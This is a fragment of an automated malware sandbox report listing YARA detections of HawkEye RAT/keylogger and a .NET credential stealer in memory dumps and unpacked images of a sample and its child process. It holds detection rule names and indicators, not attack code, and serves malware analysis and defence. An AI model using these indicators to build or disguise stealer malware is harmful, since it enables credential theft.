                Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00406043
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00404618
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_0040681A
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040E101
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00414C54
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00414C54
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00414170
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00416E2D
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00415EC1
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_004146E2
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040314F
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00412F84
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0040A2A5
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02307A60
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02305758
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02306048
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02307DB8
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02307098
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02301D98
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0230708A
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02301DA8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404DDB
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_0040BD8A
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404E4C
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404EBD
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404F4E
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00404419
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00404516
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00413538
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_004145A1
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_0040E639
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_004337AF
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_004399B1
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_0043DAE7
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00405CF6
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00403F85
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00411F99
                Source: TGQfHfehsY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 5.2.pjavpo.exe.7bf0000.21.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.7aa0000.20.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.pjavpo.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
